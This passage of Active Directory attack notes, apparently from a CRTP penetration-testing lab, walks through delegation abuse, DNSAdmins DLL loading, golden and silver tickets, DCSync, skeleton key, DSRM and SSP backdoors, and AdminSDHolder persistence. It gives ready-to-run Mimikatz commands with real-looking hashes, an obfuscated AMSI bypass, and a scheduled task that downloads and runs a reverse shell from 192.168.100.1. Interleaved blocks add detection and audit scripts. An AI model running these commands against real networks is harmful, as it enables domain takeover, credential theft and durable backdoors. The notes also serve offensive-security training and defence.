Command     : Invoke-Mimikatz -Command ' "kerberos::ptt <.kirbi TGS file>" '
              ls \\dcorp-mssql.dollarcorp.moneycorp.local\c$
Description : Load the obtained TGS into the current session
Privileges  : domain user

- Another interesting issue in Kerberos is that the delegation occurs not only for the specified service, but for any service running under the same account. There is no validation of the SPN specified.
- This is huge, as it allows access to many interesting services (like LDAP) when the delegation may be for a non-intrusive service!

Tool        : kekeo (a tool to read and write tickets without having admin privs)
Command     : tgt::ask /user:dcorp-adminsrv /domain:dollarcorp.moneycorp.local /rc4:<adminsrv's hash>
Description : Request a TGT
Privileges  : Domain user
Comments    : Getting a TGT is equivalent to having local admin privs on the service account.

Tool        : kekeo (a tool to read and write tickets without having admin privs)
Command     : tgs::s4u /tgt:<.kirbi file received from asktgt> /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.local|ldap/dcorp-dc.dollarcorp.moneycorp.local
Description : Request a TGS (for TIME, which is an msDS-AllowedToDelegateTo listing, AND LDAP, which is not a listing)
Privileges  : domain user
Comments    : /user = the user to be impersonated
              /service = the service listed in msDS-AllowedToDelegateTo for which we request the TGS

Tool        : Mimikatz (Invoke-Mimikatz)
Command     : Invoke-Mimikatz -Command ' "kerberos::ptt <.kirbi TGS of LDAP file>" '
Description : Load the obtained TGS into the current session
Privileges  : domain user

Tool        : Mimikatz (Invoke-Mimikatz)
Command     : Invoke-Mimikatz -Command ' "lsadump::dcsync /user:dcorp\krbtgt" '
Description : Perform DCSync to dump domain secrets
Privileges  : Domain user
Comments    : Impersonating a DA and querying the DC using LDAP

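Both the AS-REP roasting step (Set-DomainObject ... -XOR @{useraccountcontrol=4194304}) and the delegation section above come down to single bits in userAccountControl. As an added example (not from the original checklist), the function below decodes the bits involved so an auditor can read a raw value, and it shows why XOR is a toggle rather than a set: on an account that already has DONT_REQ_PREAUTH, XOR with 4194304 switches pre-auth back on. The flag constants are the documented userAccountControl values; the account names and values are constructed.

```powershell
# Added example: decode the userAccountControl bits that the checklist's AS-REP
# roasting and delegation steps rely on, and show what an XOR of 4194304 does.

$UacFlags = [ordered]@{
    NORMAL_ACCOUNT                 = 0x0000200   # 512
    WORKSTATION_TRUST_ACCOUNT      = 0x0001000   # 4096     : computer account
    DONT_EXPIRE_PASSWORD           = 0x0010000   # 65536
    TRUSTED_FOR_DELEGATION         = 0x0080000   # 524288   : unconstrained delegation
    DONT_REQ_PREAUTH               = 0x0400000   # 4194304  : AS-REP roastable
    TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # 16777216 : T2A4D, protocol transition
}

function ConvertFrom-Uac {
    param([Parameter(Mandatory)][int]$Value)
    # Return the name of every known flag set in the value.
    $set = foreach ($name in $UacFlags.Keys) {
        if (($Value -band $UacFlags[$name]) -ne 0) { $name }
    }
    return @($set)
}

function Test-UacRisk {
    param([Parameter(Mandatory)][string]$SamAccountName,
          [Parameter(Mandatory)][int]$Value)
    $flags = ConvertFrom-Uac -Value $Value
    [pscustomobject]@{
        Account            = $SamAccountName
        Value              = $Value
        Flags              = $flags -join '|'
        AsRepRoastable     = $flags -contains 'DONT_REQ_PREAUTH'
        Unconstrained      = $flags -contains 'TRUSTED_FOR_DELEGATION'
        ProtocolTransition = $flags -contains 'TRUSTED_TO_AUTH_FOR_DELEGATION'
    }
}

# Constructed sample accounts (values are illustrative, not read from a domain).
$accounts = @(
    @{ Name = 'control1user';  Uac = 512 }                          # plain user
    @{ Name = 'vpn1user';      Uac = 512 -bor 4194304 }             # pre-auth already disabled
    @{ Name = 'websvc';        Uac = 512 -bor 65536 -bor 16777216 } # constrained + protocol transition
    @{ Name = 'DCORP-APPSRV$'; Uac = 4096 -bor 524288 }             # computer with unconstrained delegation
)
$accounts | ForEach-Object { Test-UacRisk -SamAccountName $_.Name -Value $_.Uac } | Format-Table -AutoSize

# XOR is a toggle, not a set: the same operation flips the bit back off.
$after1 = 512 -bxor 4194304                  # control1user: 4194816, pre-auth now disabled
$after2 = (512 -bor 4194304) -bxor 4194304   # vpn1user: 512, pre-auth re-enabled
"control1user after XOR: $after1 -> $((ConvertFrom-Uac $after1) -join '|')"
"vpn1user after XOR:     $after2 -> $((ConvertFrom-Uac $after2) -join '|')"
```

The same decoder can be pointed at live objects with Get-ADUser -Filter * -Properties userAccountControl, which is how the Get-ADUser -Filter {TrustedForDelegation -eq $True} and DoesNotRequirePreAuth checks above are evaluated under the hood.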
- Members of the DNSAdmins group can make the DNS service (dns.exe, running as SYSTEM) load an arbitrary DLL.
- If the DC also serves as DNS server (the usual setup), this gives us escalation to DA on the DC.
- To abuse this, the DNS service has to be restarted so that the new DLL gets loaded; by default, DNSAdmins are NOT given privileges to restart the DNS service, so check that first.

Reference articles:
https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html

Enumerate the members of the DNSAdmins group (domain user privs):
PowerView: Get-NetGroupMember -GroupName "DNSAdmins"
AD Module: Get-ADGroupMember -Identity DNSAdmins

Once we know the members of DNSAdmins, we need to compromise one of them. In this case we already have the hash of srvadmin because of derivative local admin:
Invoke-Mimikatz -Command ' "sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /ntlm:<hash> /run:powershell.exe" '

From the privs of a DNSAdmins member, configure the plugin DLL (both methods need RSAT DNS):
Method 1, dnscmd.exe:
dnscmd dcorp-dc /config /serverlevelplugindll \\172.16.50.100\dll\mimilib.dll
Method 2, DNSServer module:
$dnsettings = Get-DnsServerSetting -ComputerName dcorp-dc -Verbose -All
$dnsettings.ServerLevelPluginDll = "\\172.16.50.100\dll\mimilib.dll"
Set-DnsServerSetting -InputObject $dnsettings -ComputerName dcorp-dc -Verbose
(Give read/write permission to Everyone on the shared folder, in this case the dll folder: it is the DC's machine account, not us, that fetches the DLL when the service starts, so read access for it is what matters. Both methods write the path into the registry value HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll, which is the thing to audit on the defensive side.)

Next, restart the service (needs the restart privilege on the DNS service, which DNSAdmins do not have by default). From a cmd prompt (in PowerShell use sc.exe, since sc is an alias of Set-Content):
sc \\dcorp-dc stop dns
sc \\dcorp-dc start dns

If the DLL injection succeeds (mimilib.dll is loaded into the DNS service), a file named kiwidns.log is created in the System32 folder of the DC and all requests sent to the domain's DNS server are logged to it.
- The NTLM hash of a password is the RC4-HMAC Kerberos key, so an NTLM hash is enough to forge RC4-encrypted tickets.
- The logon ticket (TGT) provides the user's authentication to the DC.
- Kerberos policy (ticket lifetimes etc.) is only checked when the TGT is created.
- The DC validates the user account only when the TGT is older than 20 minutes.
- Service ticket (TGS) PAC validation is optional and rare.
- When it does happen, the server's LSASS sends a PAC validation request to the DC's netlogon service.
- If the service runs under a service account (not SYSTEM), PAC validation is optional.
- If a service runs as SYSTEM, it performs server signature verification on the PAC itself with the computer account's long-term key, without asking the DC.

PERSISTENCE - GOLDEN TICKET

- A golden ticket is signed and encrypted with the hash (key) of the krbtgt account, which makes it a valid TGT.
- Since the DC does not validate the user account until the TGT is older than 20 minutes, even deleted/revoked accounts can be used.
- With the krbtgt hash we can impersonate any user with any privileges, even from a non-domain-joined machine.
- A password change of the impersonated user has no effect on this attack; only resetting the krbtgt password (twice, so that the previous key is no longer accepted) invalidates existing golden tickets.
- Forging and using the ticket needs no domain privs or local admin privs and works from a non-domain-joined machine; DA privs are needed only once, to obtain the krbtgt hash.

AMSI bypass (normal user):
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
(AMSI, the Anti-Malware Scan Interface, lets the registered AV on the machine inspect the scripts we load into memory, PowerShell included. To use Invoke-Mimikatz, always obfuscate it or bypass AMSI first. The one-liner above is an obfuscated way of setting the non-public static field System.Management.Automation.AmsiUtils.amsiInitFailed to $true, which makes PowerShell skip AMSI scanning for the process.)

Dump the krbtgt hash (DA privs):
Invoke-Mimikatz -Command ' "lsadump::lsa /patch" ' -ComputerName dcorp-dc.dollarcorp.moneycorp.local
(Executes mimikatz on the DC as DA. -ComputerName can be omitted when we are interactively logged on to the DC with DA privs: Invoke-Mimikatz -Command ' "lsadump::lsa /patch" ')

Create and inject the golden ticket (needs only the krbtgt hash obtained above):
Invoke-Mimikatz -Command ' "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-268341927-4156871508-1792461683 /krbtgt:a9b30e5b0dc865eadcea9411e4ade72d /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt" '
kerberos::golden - name of the module
/User:Administrator - username for which the TGT is generated
/domain:dollarcorp.moneycorp.local - domain FQDN
/sid:<sid> - SID of the domain
/krbtgt - NTLM (RC4) hash of the krbtgt account; use /aes128 or /aes256 to forge with the AES keys instead
/id:500 /groups:512 - optional user RID (default 500) and groups (default 513, 512, 520, 518, 519)
/ptt - injects the ticket into the current powershell process (no need to save it to disk), or
/ticket - saves the ticket to a file for later use
/startoffset:0 - optional offset in minutes from which the ticket is valid (default 0); negative for a ticket valid from the past, larger for the future
/endin:600 - optional ticket lifetime in minutes (mimikatz default 10 years); the default AD policy is 10 hours (600 minutes)
/renewmax:10080 - optional renewable lifetime in minutes (mimikatz default 10 years); the default AD policy is 7 days (10080 minutes)
(Values that match the domain policy, and AES keys in a domain that uses AES, make the ticket look like a real one; the 10-year mimikatz defaults and RC4 are easy hunting indicators.)

Verify and use the ticket (normal user; the golden ticket is injected in the current process):
klist
(lists the tickets in the current session)
ls \\dcorp-dc.dollarcorp.moneycorp.local\c$
(with the golden ticket injected we can access the DC's shares and dump data this way as well)

Alternative to running mimikatz on the DC: DCSync (DA privs, or the replication rights described under Rights Abuse below):
Invoke-Mimikatz -Command ' "lsadump::dcsync /user:dcorp\krbtgt" '
(Instead of dumping hashes on the DC with lsadump::lsa /patch, we ask the DC to replicate the krbtgt secrets to us, which it does for anyone holding the replication rights. This needs no code execution on the DC, so it is much quieter than the lsadump approach. It is not invisible, though: the replication request is logged on the DC as event 4662 with the DS-Replication-Get-Changes GUIDs, and such a request from a host that is not a DC is a standard detection.)

PERSISTENCE - SILVER TICKET

- In the golden ticket case, the feature (trust) abused is that the DC validates the TGT using the key of the krbtgt account.
- In the silver ticket case, the feature (trust) abused is that the application server validates the TGS using the key of the service account, with no round trip to the DC.
- So for a silver ticket we extract the hash of the service account, which lets us access that service as any user (including high-privileged ones).
- A silver ticket is a valid TGS (a golden ticket is a valid TGT), encrypted and signed with the NTLM hash of the account the service runs under (a golden ticket is signed with the krbtgt hash).
- Services rarely check the PAC (Privilege Attribute Certificate), so the forged group membership is accepted as-is.
- A silver ticket only grants access to the specific service it was forged for, on that host.
- Reasonable persistence period: by default a computer account password is rotated every 30 days, after which a ticket forged with the old key stops working.
- All the interesting services in a domain (CIFS, HOST, RPCSS, WSMAN, etc.) run under the machine account, so we target machine accounts (in particular the domain controller's machine account).
- We use mimikatz to dump the machine account hash of the DC.

Dump the DC machine account hash (DA privs):
Invoke-Mimikatz -Command ' "lsadump::lsa /patch" ' -ComputerName dcorp-dc.dollarcorp.moneycorp.local
(Executes mimikatz on the DC and returns the domain secrets: krbtgt hash, machine account hashes, etc. In our case the machine account is DCORP-DC$. -ComputerName can be omitted when interactively logged on to the DC with DA privs.)

Forge a CIFS ticket for the DC (needs only the machine account hash obtained above):
Invoke-Mimikatz -Command ' "kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-268341927-4156871508-1792461683 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /user:Administrator /ptt" '
(Using the hash of the DC machine account, this gives access to the shares on the DC.)
kerberos::golden - name of the module (there is no separate silver module)
/user:Administrator - username for which the TGS is generated
/domain, /sid - domain FQDN and domain SID
/target:dcorp-dc.dollarcorp.moneycorp.local - target server FQDN
/service:CIFS - the service class of the SPN for which the TGS is created
/rc4 - NTLM (RC4) hash of the service account; use /aes128 or /aes256 for the AES keys
/id, /groups, /ptt, /ticket, /startoffset, /endin, /renewmax - same meaning as for the golden ticket

- The same command works for any other service on the machine, such as HOST, RPCSS, WSMAN and many more (list of services and their SPNs: https://adsecurity.org/?page_id=183).

- There are various ways of achieving command execution with silver tickets. A ticket for the HOST SPN allows us to schedule a task on the target:
Invoke-Mimikatz -Command ' "kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-268341927-4156871508-1792461683 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /user:Administrator /ptt" '

- First, check whether we can list the tasks on the DC:
schtasks /S dcorp-dc.dollarcorp.moneycorp.local

- Schedule a task (the HOST SPN allows us to do so) that fetches a reverse shell with NT Authority\SYSTEM privs; the task name is "STCheck":
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://192.168.100.1:8080/Invoke-PowerShellTcp.ps1''')'"

- Now run the task we created:
schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck"
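Hunting for forged tickets in the ticket cache, as an added example that is not part of the original notes: the parser below reads klist output (a constructed sample is embedded; pass (klist | Out-String) for a live check) and flags tickets whose lifetime or renewal window exceeds the default 10 h / 7 d policy, RC4 tickets when the domain is expected to use AES, and tickets with no "Kdc Called" entry. The thresholds, the -ExpectAes assumption and the empty-KDC heuristic for /ptt-injected tickets are mine, not the page's.

```powershell
# Added example, not from the CRTP page. Parses `klist` output and flags tickets that
# look forged. Assumptions: default Kerberos policy (10 h ticket / 7 d renewal), an
# AES-capable domain when -ExpectAes is used, and that an injected (/ptt) ticket
# leaves "Kdc Called" empty because no KDC was ever contacted for it.

function Get-KlistField([string]$Block, [string]$Label) {
    # One "Label: value" line from a single ticket block; strips the "(local)" suffix klist adds to times.
    if ($Block -match "(?m)^\s*$Label\s*:\s*(.+?)\s*$") { return ($Matches[1] -replace '\s*\(local\)$', '') }
    return ''
}

function ConvertTo-KlistTime([string]$Text) {
    # klist prints times in the system locale; invariant M/d/yyyy H:mm:ss is what an en-US box produces.
    $d = [datetime]::MinValue
    [void][datetime]::TryParse($Text, [cultureinfo]::InvariantCulture, [System.Globalization.DateTimeStyles]::None, [ref]$d)
    return $d
}

function Get-KlistTicket([string]$KlistOutput) {
    # Every cached ticket in klist output starts with "#<n>>"; split on that and parse each block.
    foreach ($block in ($KlistOutput -split '(?m)^#\d+>' | Where-Object { $_ -match 'Server:' })) {
        [pscustomobject]@{
            Client    = Get-KlistField $block 'Client'
            Server    = Get-KlistField $block 'Server'
            EncType   = Get-KlistField $block 'KerbTicket Encryption Type'
            Start     = ConvertTo-KlistTime (Get-KlistField $block 'Start Time')
            End       = ConvertTo-KlistTime (Get-KlistField $block 'End Time')
            Renew     = ConvertTo-KlistTime (Get-KlistField $block 'Renew Time')
            KdcCalled = Get-KlistField $block 'Kdc Called'
        }
    }
}

function Test-KlistTicketAnomaly {
    param([Parameter(Mandatory)][string]$KlistOutput,
          [int]$MaxLifetimeHours = 10,   # default domain policy for TGTs and TGSs (assumption)
          [int]$MaxRenewDays = 7,        # default renewable lifetime (assumption)
          [switch]$ExpectAes)            # set when every account has AES keys, so RC4 is abnormal
    foreach ($t in Get-KlistTicket $KlistOutput) {
        $why = @()
        if ($t.End -gt $t.Start -and ($t.End - $t.Start).TotalHours -gt $MaxLifetimeHours) {
            $why += "lifetime $([int]($t.End - $t.Start).TotalHours)h > ${MaxLifetimeHours}h (kerberos::golden default is 10 years)"
        }
        if ($t.Renew -gt $t.Start -and ($t.Renew - $t.Start).TotalDays -gt $MaxRenewDays) {
            $why += "renewable for $([int]($t.Renew - $t.Start).TotalDays)d > ${MaxRenewDays}d"
        }
        if ($ExpectAes -and $t.EncType -match 'RC4') { $why += 'RC4 ticket in an AES domain (forged from an NTLM hash?)' }
        if (-not $t.KdcCalled) { $why += 'no KDC recorded (ticket injected with /ptt rather than requested)' }
        [pscustomobject]@{
            Kind    = if ($t.Server -like 'krbtgt/*') { 'TGT (golden if forged)' } else { 'TGS (silver if forged)' }
            Client  = $t.Client
            Server  = $t.Server
            Suspect = $why.Count -gt 0
            Reasons = $why -join '; '
        }
    }
}

# Constructed sample (not captured from a real host): a genuine AES TGT, then a CIFS ticket
# forged with kerberos::golden defaults (RC4, 10-year lifetime, injected with /ptt).
$sampleKlist = @'
Cached Tickets: (2)

#0>     Client: student1 @ DOLLARCORP.MONEYCORP.LOCAL
        Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 3/4/2024 9:00:00 (local)
        End Time:   3/4/2024 19:00:00 (local)
        Renew Time: 3/11/2024 9:00:00 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: dcorp-dc.dollarcorp.moneycorp.local

#1>     Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: cifs/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 3/4/2024 9:05:00 (local)
        End Time:   3/2/2034 9:05:00 (local)
        Renew Time: 3/2/2034 9:05:00 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:
'@

Test-KlistTicketAnomaly -KlistOutput $sampleKlist -ExpectAes | Format-Table -AutoSize
# Live check on the current logon session:
# Test-KlistTicketAnomaly -KlistOutput (klist | Out-String) -ExpectAes | Where-Object Suspect
```

On the sample, only the CIFS ticket is marked Suspect, with all four reasons. A ticket forged with /endin:600 /renewmax:10080 and an AES key will pass the first three checks, so on a real host the empty "Kdc Called" field and a ticket for a user who never logged on there are what remain; treat the output as a review queue, not a verdict.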

PERSISTENCE - SKELETON KEY

- Skeleton key is a persistence technique where the lsass process of a domain controller is patched so that the DC accepts a single master password (the "skeleton key") for any user, while the users' real passwords keep working.
- The attack was discovered by Dell SecureWorks in malware named the Skeleton Key malware.
- All publicly known methods are NOT persistent across reboots (the patch lives only in the DC's memory).
- Yet again, mimikatz to the rescue!

Inject the skeleton key on the DC (DA privs required; the master password becomes "mimikatz"):
Invoke-Mimikatz -Command ' "privilege::debug" "misc::skeleton" ' -ComputerName dcorp-dc.dollarcorp.moneycorp.local
(When used in an actual red team, modify the script and use a stronger skeleton key than "mimikatz".)

- Now it is possible to access any machine that authenticates against this DC with a valid username and the password "mimikatz":
Enter-PSSession -ComputerName dcorp-dc -Credential dcorp\Administrator
(This prompts for the password; enter "mimikatz".)

- If lsass runs as a protected process (RunAsPPL), the skeleton key can still be used, but it needs the mimikatz driver (mimidrv.sys) on the disk of the target DC:
mimikatz# privilege::debug
mimikatz# !+
mimikatz# !processprotect /process:lsass.exe /remove
mimikatz# misc::skeleton
mimikatz# !-

- Note that the above is very noisy in logs: loading the driver installs a kernel-mode service (System event 7045, and Security event 4697 when service installation auditing is enabled).
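A quick check for the behaviour described above (any account, one master password), as an added example that is not part of the original notes: bind to the DC over LDAP as a test account using the skeleton password and nothing else. A successful bind means the DC accepts the master password. The function and its defaults are mine; it assumes LDAP reachability to the DC and a test account whose real password is different.

```powershell
# Added example, not from the CRTP page: does this DC accept the skeleton key password
# for an account whose real password is something else? $true means lsass on that DC
# has been patched (or the account genuinely has that password). Every $false costs the
# account one failed logon on the DC, so mind lockout thresholds and use an account you own.
function Test-SkeletonKey {
    param(
        [Parameter(Mandatory)][string]$DomainController,   # e.g. dcorp-dc.dollarcorp.moneycorp.local
        [Parameter(Mandatory)][string]$UserName,           # DOMAIN\user; a non-privileged test account is enough
        [string]$SkeletonPassword = 'mimikatz'             # mimikatz default; change it if a custom key is suspected
    )
    # Secure (SSPI) bind: a patched LSASS accepts the skeleton password for both Kerberos and NTLM.
    $entry = New-Object System.DirectoryServices.DirectoryEntry(
        "LDAP://$DomainController/RootDSE", $UserName, $SkeletonPassword,
        [System.DirectoryServices.AuthenticationTypes]::Secure)
    try {
        [void]$entry.NativeObject   # forces the bind; throws on bad credentials
        return $true
    } catch [System.Runtime.InteropServices.COMException] {
        return $false               # logon denied: no skeleton key (network errors still propagate)
    } finally {
        $entry.Dispose()
    }
}

# Usage: Test-SkeletonKey -DomainController dcorp-dc.dollarcorp.moneycorp.local -UserName 'dcorp\student1'
# $true on a DC where misc::skeleton has run; $false (plus a failed-logon event on the DC) otherwise.
```

Run it against each DC individually: the patch lives in one DC's lsass, so a domain that is only partially compromised answers differently depending on which DC handles the bind.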

PERSISTENCE - DSRM

- DSRM is Directory Services Restore Mode.
- Every DC has a local administrator called "Administrator" whose password is the DSRM password. (Note that this is NOT the RID 500 domain Administrator.)
- The DSRM password (SafeModePassword) is set when a server is promoted to domain controller and is rarely changed afterwards.
- It is meant for booting the DC into safe mode / DSRM to repair the directory.
- After altering one registry value on the DC, it is possible to pass the NTLM hash of this account to access the DC over the network.

Dump the DSRM account hash (DA privs, since it lives in the DC's local SAM):
Invoke-Mimikatz -Command ' "token::elevate" "lsadump::sam" ' -ComputerName dcorp-dc
(lsadump::lsa /patch, as used for golden/silver tickets, reads domain secrets from the lsass process; lsadump::sam reads the local SAM hive, which is where the DSRM "Administrator" hash is.)

- Since the DSRM password is that of the DC's local administrator, we can pass the hash to authenticate. But the logon behaviour for the DSRM account must be changed first; by default it can only log on while the DC is in DSRM:
Step 1: log in to the DC
Enter-PSSession -ComputerName dcorp-dc
Step 2: create the registry value if it does not exist
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
or modify it if it already exists
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2
Step 3: check the value
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\"
(DsrmAdminLogonBehavior: 0 or absent = the DSRM account can log on only in DSRM; 1 = also when the AD DS service is stopped; 2 = always, including network logons, which is what the backdoor needs. The value is a one-line audit check for every DC.)

- Later (say after 6 months), when we want our DA privileges back, we can always run the following, since we have the hash of the DSRM account and have changed its logon behaviour:
Invoke-Mimikatz -Command ' "sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:<hash_of_DSRM> /run:powershell.exe" '
ls \\dcorp-dc\C$

Note:
1. Disable real-time monitoring before running this, or the pass-the-hash gets blocked.
2. Run the powershell session as local admin (very important).
3. Use the DC's hostname (dcorp-dc) as /domain and in the UNC path, not the domain name: this is a local account of the DC, so the logon must be an NTLM logon against that host.

PERSISTENCE - Custom SSP

- A Security Support Provider (SSP) is a DLL which provides ways for an application to obtain an authenticated connection. Some SSP packages by Microsoft are:
  * NTLM
  * Kerberos
  * Wdigest
  * CredSSP
- Mimikatz provides a custom SSP, mimilib.dll.
- This SSP logs local logons, service account and machine account passwords in clear text on the target server, because LSASS hands every new logon's credentials to each registered package.

Method 1
Drop mimilib.dll into the System32 folder of the DC, then add mimilib to the registry value HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages (PowerShell):

$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages

And reboot the DC (the package list is only read at LSASS start, which is why this variant survives reboots and the next one does not).

Method 2
Using mimikatz, inject the SSP into LSASS (not stable with Server 2016):

Invoke-Mimikatz -Command ' "misc::memssp" '

(No reboot required, but the injection is lost when the DC reboots.)
All local logons on the DC are logged to:
C:\Windows\system32\kiwissp.log

It is possible to modify the code so that kiwissp.log is created in the SYSVOL folder, which is readable by every machine in the domain, so the captured passwords can be collected without logging on to the DC again.
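The three DC backdoors above (the DNSAdmins plugin DLL, the DSRM logon behaviour and the custom SSP) all leave a trace in the DC's registry or on its disk. The audit below, an added example that is not part of the original notes, reads those traces from every writable DC over PS Remoting. It assumes the RSAT ActiveDirectory module for the DC list and the right to read the DCs' registry (DA in the lab); the known-good SSP list is an assumption to adjust for the OS build.

```powershell
# Added example, not from the CRTP page: audit every DC for the three registry-backed
# persistence points described above. Assumes the ActiveDirectory module (RSAT) for the
# DC list and PS Remoting rights on the DCs. Returns one object per DC with its findings.

function Get-DcPersistenceFinding {
    [CmdletBinding()]
    param(
        # DCs to audit; defaults to every DC in the current domain.
        [string[]]$ComputerName = (Get-ADDomainController -Filter * | Select-Object -ExpandProperty HostName),
        # Baseline SSPs for a DC (assumption; cloudap only exists on newer builds). Anything else is a finding.
        [string[]]$KnownSecurityPackages = @('kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u', 'cloudap')
    )

    $probe = {
        param($Known)
        $lsa      = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
        $lsaOs    = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig'
        $dnsParam = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
        $findings = New-Object System.Collections.Generic.List[string]

        # 1. DNSAdmins abuse: ServerLevelPluginDll is what dnscmd /config /serverlevelplugindll writes.
        $plugin = (Get-ItemProperty -Path $dnsParam -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
        if ($plugin) { $findings.Add("DNS ServerLevelPluginDll is set: $plugin") }

        # 2. DSRM abuse: 1 or 2 lets the DSRM account log on outside restore mode.
        $dsrm = (Get-ItemProperty -Path $lsa -Name DsrmAdminLogonBehavior -ErrorAction SilentlyContinue).DsrmAdminLogonBehavior
        if ($dsrm -and $dsrm -ne 0) { $findings.Add("DsrmAdminLogonBehavior = $dsrm (expected absent or 0)") }

        # 3. Custom SSP: compare both 'Security Packages' values with the known list.
        #    On current builds Lsa\Security Packages is literally the string "" by default.
        foreach ($key in @($lsa, $lsaOs)) {
            $pkgs = (Get-ItemProperty -Path $key -Name 'Security Packages' -ErrorAction SilentlyContinue).'Security Packages'
            foreach ($p in @($pkgs)) {
                if ($p -and $p.Trim() -ne '""' -and $Known -notcontains $p.Trim().ToLower()) {
                    $findings.Add("Unknown SSP '$p' in $key")
                }
            }
        }

        # 4. On-disk artefacts of mimilib: kiwidns.log (DNS plugin) and kiwissp.log (SSP).
        foreach ($f in @("$env:SystemRoot\System32\kiwidns.log", "$env:SystemRoot\System32\kiwissp.log")) {
            if (Test-Path $f) { $findings.Add("mimilib log present: $f") }
        }

        [pscustomobject]@{ Computer = $env:COMPUTERNAME; Findings = $findings.ToArray() }
    }

    Invoke-Command -ComputerName $ComputerName -ScriptBlock $probe -ArgumentList (, $KnownSecurityPackages)
}

# Usage: Get-DcPersistenceFinding | Where-Object { $_.Findings.Count -gt 0 } | Format-List
```

Method 2 of the SSP section (misc::memssp) patches LSASS in memory and does not touch the registry, so check 3 only catches Method 1; the kiwissp.log check in step 4 covers both, since the injected code writes the same file.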

PERSISTENCE using ACLs - AdminSDHolder

- AdminSDHolder is a container in the System container of the domain that is used to control the permissions (through its ACL) of certain built-in privileged groups (called Protected Groups) and their members.
- The Security Descriptor Propagator (SDProp) process runs every hour, compares the ACL of the protected groups and their members with the ACL of AdminSDHolder, and overwrites any differences on the object's ACL. Hand-edits to a protected group's own ACL are therefore reverted within the hour, while edits to AdminSDHolder are propagated instead.
- Protected groups: Account Operators, Backup Operators, Server Operators, Print Operators, Domain Admins, Replicator, Enterprise Admins, Domain Controllers, Read-Only Domain Controllers, Schema Admins, Administrators.

- Why are these groups called Protected Groups? Well-known abuses of some of them:
  * Account Operators - cannot modify Domain Admins, Enterprise Admins or built-in Administrators, but can modify the groups nested within them.
  * Backup Operators - back up a GPO, edit it to add the SID of a controlled account to a privileged group, and restore it.
  * Server Operators - run a command as SYSTEM on the DC (using the disabled Browser service).
  * Print Operators - copy an ntds.dit backup, load device drivers.
- All of the protected groups above can log on locally to a DC.

- During red teams, after getting DA privs, creating a user and making it a member of the DA group is usually detected. Instead, without becoming a member of DA, we modify the ACL of AdminSDHolder so that our user has full permissions on the DA group (and on every other protected group) without being part of it.

Run SDProp manually (DA privs):
Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose

Add FullControl for a user (student1 here) to AdminSDHolder (DA privs required):
PowerView: Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights All -Verbose
AD Module with Set-ADACL: Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -Principal student1 -Verbose

Other than FullControl, other interesting permissions (ResetPassword, WriteMembers) can be given to a user on AdminSDHolder (DA privs required):
